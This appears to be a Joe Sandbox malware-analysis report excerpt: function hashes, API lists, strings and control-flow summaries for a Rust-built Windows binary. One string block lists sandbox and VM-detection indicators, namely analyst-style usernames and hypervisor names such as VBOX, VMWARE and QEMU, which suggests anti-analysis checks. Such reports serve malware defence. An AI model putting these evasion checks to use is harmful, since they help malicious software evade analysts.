                                        • Instruction Fuzzy Hash: 4B316032A086858BE764DF1AF0847AAF7A1EBC9350F504035DA9943B94EE3CE080CF44
                                        Strings
                                        • /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel, xrefs: 00007FF7F4108B4D, 00007FF7F4108E1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
                                        • API String ID: 0-984818510
                                        • Opcode ID: d384c8ecaa7220cd52494481d8886919a28e692dbd5ca23d0021bcb48872dee7
                                        • Instruction ID: b421cb45188825b774880933d4cd3fa71d4abe5bda61688bc3acd30ca2afff93
                                        • Opcode Fuzzy Hash: d384c8ecaa7220cd52494481d8886919a28e692dbd5ca23d0021bcb48872dee7
                                        • Instruction Fuzzy Hash: F3919262F08B5186E710AF26E8843E8B7A0FB48B98F584635EE6D177C5DF39D185C390

                                        Control-flow Graph

                                        • Graph image not extracted (executed/not-executed colouring lost). Function entry 7ff7f411a610 calls 7ff7f41218f0; block 7ff7f411a693 calls CloseHandle; blocks 7ff7f411a75b, 7ff7f411a78d and 7ff7f411a6ff call 7ff7f4120950 / 7ff7f4120d20 and on failure 7ff7f413f870; block 7ff7f411a7c0 calls WaitForSingleObject; block 7ff7f411a7dc calls GetLastError; block 7ff7f411a821 calls GetExitCodeProcess; block 7ff7f411a865 calls CloseHandle twice; block 7ff7f411a944 calls CloseHandle.
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait
                                        • String ID: called `Result::unwrap()` on an `Err` value
                                        • API String ID: 17306042-2333694755
                                        • Opcode ID: 98050de64407eec83e84d274591eb1f76851ba59d11f64f5e6645ddd7a7c7f19
                                        • Instruction ID: 0b36e2142f5deccf37320a4283027a9c19ec5fe24f12497a338ef8ae1013df2f
                                        • Opcode Fuzzy Hash: 98050de64407eec83e84d274591eb1f76851ba59d11f64f5e6645ddd7a7c7f19
                                        • Instruction Fuzzy Hash: F4A14232E04B818AE7619F32E8803E97764FB45798F548226DE5D07B99DF38D185C390

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                        • String ID:
                                        • API String ID: 1804101941-0
                                        • Opcode ID: eee810bb95535470bffe68d2ba9a8a383abc4ee3ff95bb7e2462f86346f6db18
                                        • Instruction ID: ffc44ff5e5b108b0f9c3d8ec53d98cdc20cc68b7357ef2ff9b42fa3cad2b7e4c
                                        • Opcode Fuzzy Hash: eee810bb95535470bffe68d2ba9a8a383abc4ee3ff95bb7e2462f86346f6db18
                                        • Instruction Fuzzy Hash: DE312C21E0C14283FB54BF27F4913B9A3919F45784FC44434E66D0B2D7DE2DA845A2B0

                                        Control-flow Graph

                                        • Graph image not extracted (executed/not-executed colouring lost). Function entry 7ff7f411e610 calls 7ff7f41284d0 and then 7ff7f4129f80; block 7ff7f411e758 calls CreateFileW; block 7ff7f411e80f calls GetLastError on failure; block 7ff7f411e7aa calls GetLastError; block 7ff7f411e7b7 calls SetFileInformationByHandle; block 7ff7f411e85a calls GetLastError and CloseHandle; error paths call 7ff7f410a130 before returning through 7ff7f411e7ff.
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FileHandle$CloseCreateInformation
                                        • String ID:
                                        • API String ID: 1617036312-0
                                        • Opcode ID: 0ddb327ce91df9d84e5046fd063802ff5ba92c5831474f6817db1fb96f3d3a89
                                        • Instruction ID: bfe2f9851084e3a91a0163865f862fbcf2e26db29545769ea01f98d65bddd126
                                        • Opcode Fuzzy Hash: 0ddb327ce91df9d84e5046fd063802ff5ba92c5831474f6817db1fb96f3d3a89
                                        • Instruction Fuzzy Hash: 6D71D361F0835247FB616FA3E48037AAAB4AF94BA4F944131CD6D07AC8DE3CD84583E0

                                        Control-flow Graph

                                        • Graph image not extracted (executed/not-executed colouring lost). Function entry 7ff7f4114ca0; block 7ff7f4114cc1 calls CreateWaitableTimerExW; block 7ff7f4114d00 calls SetWaitableTimer; block 7ff7f4114d2f calls WaitForSingleObject and CloseHandle; block 7ff7f4114d51 calls CloseHandle; block 7ff7f4114d9e calls Sleep and is reached when the timer path is not taken.
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                        • String ID:
                                        • API String ID: 2261246915-0
                                        • Opcode ID: abd99af6bd88042d1dd5512cba818c5c5812610d3b38a9f3d41f1412972b137f
                                        • Instruction ID: fd217d41f5750205198b39aee1828f66c63ec38d765124302f9a6aae5a4b899b
                                        • Opcode Fuzzy Hash: abd99af6bd88042d1dd5512cba818c5c5812610d3b38a9f3d41f1412972b137f
                                        • Instruction Fuzzy Hash: B821E422F0961217EF58AF37F964734862A9FD5BB0F848234DD3E46BE4DE3CA4814290

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2162 7ff7f41146c0-7ff7f4114733 AddVectoredExceptionHandler SetThreadStackGuarantee GetCurrentThread SetThreadDescription call 7ff7f4114db0 call 7ff7f4114ab0 2172 7ff7f4114736 call 7ff7f4109078 2162->2172 2173 7ff7f4114736 call 7ff7f4108fb9 2162->2173 2174 7ff7f4114736 call 7ff7f4108ff9 2162->2174 2175 7ff7f4114736 call 7ff7f4109039 2162->2175 2176 7ff7f4114736 call 7ff7f4108fbd 2162->2176 2177 7ff7f4114736 call 7ff7f4108ffd 2162->2177 2178 7ff7f4114736 call 7ff7f410907f 2162->2178 2179 7ff7f4114736 call 7ff7f4108f80 2162->2179 2180 7ff7f4114736 call 7ff7f4109040 2162->2180 2181 7ff7f4114736 call 7ff7f4108fc1 2162->2181 2182 7ff7f4114736 call 7ff7f4109001 2162->2182 2183 7ff7f4114736 call 7ff7f4108fc5 2162->2183 2184 7ff7f4114736 call 7ff7f4109047 2162->2184 2185 7ff7f4114736 call 7ff7f4109008 2162->2185 2186 7ff7f4114736 call 7ff7f4108fc9 2162->2186 2187 7ff7f4114736 call 7ff7f4108fcd 2162->2187 2188 7ff7f4114736 call 7ff7f410904e 2162->2188 2189 7ff7f4114736 call 7ff7f410900f 2162->2189 2190 7ff7f4114736 call 7ff7f4108fd1 2162->2190 2191 7ff7f4114736 call 7ff7f4108fd5 2162->2191 2192 7ff7f4114736 call 7ff7f4109055 2162->2192 2193 7ff7f4114736 call 7ff7f4109016 2162->2193 2194 7ff7f4114736 call 7ff7f4108fd9 2162->2194 2195 7ff7f4114736 call 7ff7f4108f5a 2162->2195 2196 7ff7f4114736 call 7ff7f410905c 2162->2196 2197 7ff7f4114736 call 7ff7f4108fdd 2162->2197 2198 7ff7f4114736 call 7ff7f4108fa0 2162->2198 2199 7ff7f4114736 call 7ff7f4108fe1 2162->2199 2200 7ff7f4114736 call 7ff7f4109063 2162->2200 2201 7ff7f4114736 call 7ff7f4109024 2162->2201 2202 7ff7f4114736 call 7ff7f4108fe5 2162->2202 2203 7ff7f4114736 call 7ff7f4108fe9 2162->2203 2204 7ff7f4114736 call 7ff7f410906a 2162->2204 2205 7ff7f4114736 call 7ff7f410902b 2162->2205 2206 7ff7f4114736 call 7ff7f4108fed 2162->2206 2207 7ff7f4114736 call 7ff7f4108ef0 2162->2207 2208 7ff7f4114736 call 7ff7f4108ff1 2162->2208 2209 7ff7f4114736 call 7ff7f4109071 
2162->2209 2210 7ff7f4114736 call 7ff7f4109032 2162->2210 2211 7ff7f4114736 call 7ff7f4108fb5 2162->2211 2212 7ff7f4114736 call 7ff7f4108ff5 2162->2212 2167 7ff7f4114739-7ff7f4114745 2169 7ff7f4114747-7ff7f4114757 call 7ff7f413e500 2167->2169 2170 7ff7f411475c-7ff7f4114769 2167->2170 2169->2170 2172->2167 2173->2167 2174->2167 2175->2167 2176->2167 2177->2167 2178->2167 2179->2167 2180->2167 2181->2167 2182->2167 2183->2167 2184->2167 2185->2167 2186->2167 2187->2167 2188->2167 2189->2167 2190->2167 2191->2167 2192->2167 2193->2167 2194->2167 2195->2167 2196->2167 2197->2167 2198->2167 2199->2167 2200->2167 2201->2167 2202->2167 2203->2167 2204->2167 2205->2167 2206->2167 2207->2167 2208->2167 2209->2167 2210->2167 2211->2167 2212->2167
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: Thread$CurrentDescriptionExceptionGuaranteeHandlerStackVectored
                                        • String ID: main
                                        • API String ID: 3663057573-3207122276
                                        • Opcode ID: aff96ae2daea4c37a3667f91690bbb9d7f047d6ef6fcb56457d51776b9872f87
                                        • Instruction ID: 1b5292bd5758bc6ab88904710b9bd5aea9211e1e9a9ec650129ca88173085c84
                                        • Opcode Fuzzy Hash: aff96ae2daea4c37a3667f91690bbb9d7f047d6ef6fcb56457d51776b9872f87
                                        • Instruction Fuzzy Hash: F5113D21F18B158AFB10EF66F8883EC6760AB457A4F804231CE6D566E4EF28A449C390

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ComputerName$ErrorLast
                                        • String ID:
                                        • API String ID: 2051095488-0
                                        • Opcode ID: 444db1469ea464d383774e53951557fa80ec6c9f18d07cd741958a65af9121ed
                                        • Instruction ID: 936369286e207c9c103d356f524b9d3871304dee6150c61e7abc545c0f5ecbcb
                                        • Opcode Fuzzy Hash: 444db1469ea464d383774e53951557fa80ec6c9f18d07cd741958a65af9121ed
                                        • Instruction Fuzzy Hash: F541E562F04A018AF714AF6BE8853FCAB71BF44784FA48134DE6D166C5EF389581C7A0
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F41240C9), ref: 00007FF7F4126AC8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: cf50fb6609d1fef71a3daa6ac54220e2b16af973c411700e32f6df58c2279079
                                        • Instruction ID: 7dd4ceb4cea94b6a36403289d61c7681f1176235828b4770c79dab830e337af4
                                        • Opcode Fuzzy Hash: cf50fb6609d1fef71a3daa6ac54220e2b16af973c411700e32f6df58c2279079
                                        • Instruction Fuzzy Hash: D4216D33F09A1199EB119FA2F8811ADA374B7147A8F944531DE6E53BC8EF38D592C350
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: Process$CloseCurrentHandlePrng
                                        • String ID:
                                        • API String ID: 842889843-0
                                        • Opcode ID: 54414ade01f3eaa8aa42d5ffd990672667fa5a2631ec548c5acdd5774dc2c67e
                                        • Instruction ID: 425cd0872ad15f8e0222340336234c328850d5406e2abf54abbef41035d5cdba
                                        • Opcode Fuzzy Hash: 54414ade01f3eaa8aa42d5ffd990672667fa5a2631ec548c5acdd5774dc2c67e
                                        • Instruction Fuzzy Hash: 8FF06232A08B45C6EB116F26E5803ADA752D741FE4F948031CE6D877C8DE3CE5C58390
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AddressProc$CurrentProcess$Mutex$CloseCreateHandleLibraryLoadObjectReleaseSingleWaitlstrlen
                                        • String ID: EnumerateLoadedModulesW64$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
                                        • API String ID: 422451348-310313858
                                        • Opcode ID: 9ec890d9eb561b8ec03aae37693fd9b8a1d82bb0876e46e927a256a399530a50
                                        • Instruction ID: 80034eaa31fe152910bbe18cefa85a77435b6c03867dbf09d607eab2b094b813
                                        • Opcode Fuzzy Hash: 9ec890d9eb561b8ec03aae37693fd9b8a1d82bb0876e46e927a256a399530a50
                                        • Instruction Fuzzy Hash: 2EE18F21F096428BEB51AF26F8817B9A7A0BF44798F844634DD2D477E4EF3CD18583A0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                        • String ID:
                                        • API String ID: 3140674995-0
                                        • Opcode ID: ed964a79ad5c71b51470b13f33e1ceaf77e9862fef75c8a2799fdefc0e4b490c
                                        • Instruction ID: e7d1397d4f2a52c2e865609a2faeab88983dc0a1d4c81c1f7f1a8b3c56dafefb
                                        • Opcode Fuzzy Hash: ed964a79ad5c71b51470b13f33e1ceaf77e9862fef75c8a2799fdefc0e4b490c
                                        • Instruction Fuzzy Hash: D3316F72A18B818AEB609F62F8803F9B764FB85744F844039DA5D57B99EF38C548C760
                                        Strings
                                        • NTDLL.DLL, xrefs: 00007FF7F411F385
                                        • assertion failed: self.is_char_boundary(new_len)/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\alloc\src\string.rs, xrefs: 00007FF7F411F66C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorFormatHandleLastMessageModule
                                        • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\alloc\src\string.rs
                                        • API String ID: 1273946083-2010291737
                                        • Opcode ID: 96be6f57b779d662e4bcd2e87a3bd71604cd955901bcb329d8d31bec27ed1a52
                                        • Instruction ID: b7a70c0529fa87d1b1cef9964eb40ac9d02e52b7e4b53b5f3a0277525a00b1d0
                                        • Opcode Fuzzy Hash: 96be6f57b779d662e4bcd2e87a3bd71604cd955901bcb329d8d31bec27ed1a52
                                        • Instruction Fuzzy Hash: 83A1D932E097C296E7719F22F8807FCA6B5BB853A4F804135CA6D06BD4EF789645D390
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AttributeInitializeListProcThread
                                        • String ID:
                                        • API String ID: 1263136677-0
                                        • Opcode ID: 25395b67cd61b75cc73e3c4270649077a9519a336f1647721255863f1f85be5d
                                        • Instruction ID: fce62a1cd040b37dbf050c10dafd243ae543c6894f7b216e031c962a61a9f07e
                                        • Opcode Fuzzy Hash: 25395b67cd61b75cc73e3c4270649077a9519a336f1647721255863f1f85be5d
                                        • Instruction Fuzzy Hash: 4AA1B362F18651C2FB14AF27F4847BAA6A0BB46BA4F944631DE3D437D4DE3C9245C350
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                        • String ID:
                                        • API String ID: 2933794660-0
                                        • Opcode ID: 43b5c4cba9f747e9d25ac04b51d92f885defc1a8dfb37f1489eaa0b42e208026
                                        • Instruction ID: 2f30ab2ca6cbadb4d924923fe3affc82f85b9dbf09f30182bb90623bcd39a602
                                        • Opcode Fuzzy Hash: 43b5c4cba9f747e9d25ac04b51d92f885defc1a8dfb37f1489eaa0b42e208026
                                        • Instruction Fuzzy Hash: 87114C22F18F018AEB00DF62F8942B873B4FB19B58F840A31DA6D427A4EF38D1548390
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .llvm./rust/deps\rustc-demangle-0.1.24\src/lib.rs$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`
                                        • API String ID: 0-1033176386
                                        • Opcode ID: 7630a6dac504c9da00261c8a14eb9cbe2da4fb8b3279a6e02788394730d31ae3
                                        • Instruction ID: 4236dd25dea407c22ff780a1d9db882dd46b75807daa85f29d06f6f1b022b3c4
                                        • Opcode Fuzzy Hash: 7630a6dac504c9da00261c8a14eb9cbe2da4fb8b3279a6e02788394730d31ae3
                                        • Instruction Fuzzy Hash: 89621462E1C6A287F715AF52E4842BDA762BB057A4FC44231DE7E076C4DF38D944E3A0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Authenti$GenuineI$HygonGen
                                        • API String ID: 0-696657513
                                        • Opcode ID: 9dbf57bd29ded03597238e77f78506ede310607914066700f8c9cb9e781dd6de
                                        • Instruction ID: 98579eb88ceffae6545eec442ba507c70114d0525586bdaa7cc503629fcb33b1
                                        • Opcode Fuzzy Hash: 9dbf57bd29ded03597238e77f78506ede310607914066700f8c9cb9e781dd6de
                                        • Instruction Fuzzy Hash: 8C9127A7B2595102FB5C8996FC62BB94892B3587C8F48A03DED6B97BC4D97CC9118240
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: punycode{-}0
                                        • API String ID: 0-2450133883
                                        • Opcode ID: 97c5819379e5ee1c581f9b4e4d140716286a02ff531cc5872d525446b3a5b513
                                        • Instruction ID: 7f0568542b9963903f71fbf04f7964b0ab344d569fc23d42676874500956eeca
                                        • Opcode Fuzzy Hash: 97c5819379e5ee1c581f9b4e4d140716286a02ff531cc5872d525446b3a5b513
                                        • Instruction Fuzzy Hash: AFE12962F1868A87FB649F26F4847F9A651BB45798F808231CD2D47BC4DF3CE64583A0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
